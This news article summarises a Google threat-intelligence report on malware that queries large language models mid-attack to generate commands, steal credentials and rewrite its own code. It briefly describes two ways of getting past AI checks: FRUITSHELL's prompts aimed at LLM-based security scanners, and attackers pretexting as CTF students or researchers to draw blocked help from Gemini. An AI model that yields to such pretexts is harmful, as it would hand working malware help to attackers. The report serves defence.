Google’s Threat Intelligence Group (GTIG) has identified a significant escalation in the malicious use of artificial intelligence. Adversaries are no longer just using AI for productivity tasks like drafting phishing emails; they are now deploying novel malware that actively uses AI during an attack to dynamically alter its behavior.
This new phase of AI abuse involves what Google calls “Just-in-Time” AI. For the first time, GTIG has identified malware families that use Large Language Models (LLMs) mid-execution. These tools can dynamically generate malicious scripts or obfuscate their own code on the fly to evade detection, rather than relying on hard-coded functions.
The report details several new malware families using this technique. “PROMPTSTEAL,” which was observed in active operations, is a data miner that queries a Hugging Face API to an LLM to generate Windows commands for collecting system information. “QUIETVAULT,” also seen in the wild, is a credential stealer that uses AI CLI tools installed on the victim’s machine to search for additional secrets. Another malware, “FRUITSHELL,” contains hard-coded prompts specifically designed to bypass analysis by LLM-powered security systems. Google also identified experimental malware, including “PROMPTFLUX,” a dropper that uses the Google Gemini API to repeatedly rewrite its own source code to remain hidden, and “PROMPTLOCK,” a proof-of-concept ransomware that dynamically generates malicious scripts at runtime.
The GTIG report also found that threat actors are adapting “social engineering” techniques to bypass AI safety guardrails. Google observed actors posing as students in a “capture-the-flag” competition or as cybersecurity researchers to persuade Gemini to provide information, such as help with tool development, that would otherwise be blocked.
State-sponsored actors, including those from North Korea, Iran, and the People’s Republic of China (PRC), continue to use AI like Gemini to enhance all stages of their operations, from reconnaissance and phishing lure creation to developing command and control (C2) infrastructure. Furthermore, Google notes that the underground marketplace for illicit AI tools has matured in 2025, offering multifunctional tools that lower the barrier to entry for less sophisticated attackers.
Google stated it is actively disrupting this activity by disabling projects and accounts associated with these actors. The company emphasized it is continuously improving its models, including Gemini, to make them less susceptible to misuse and is applying the intelligence to strengthen its security classifiers.




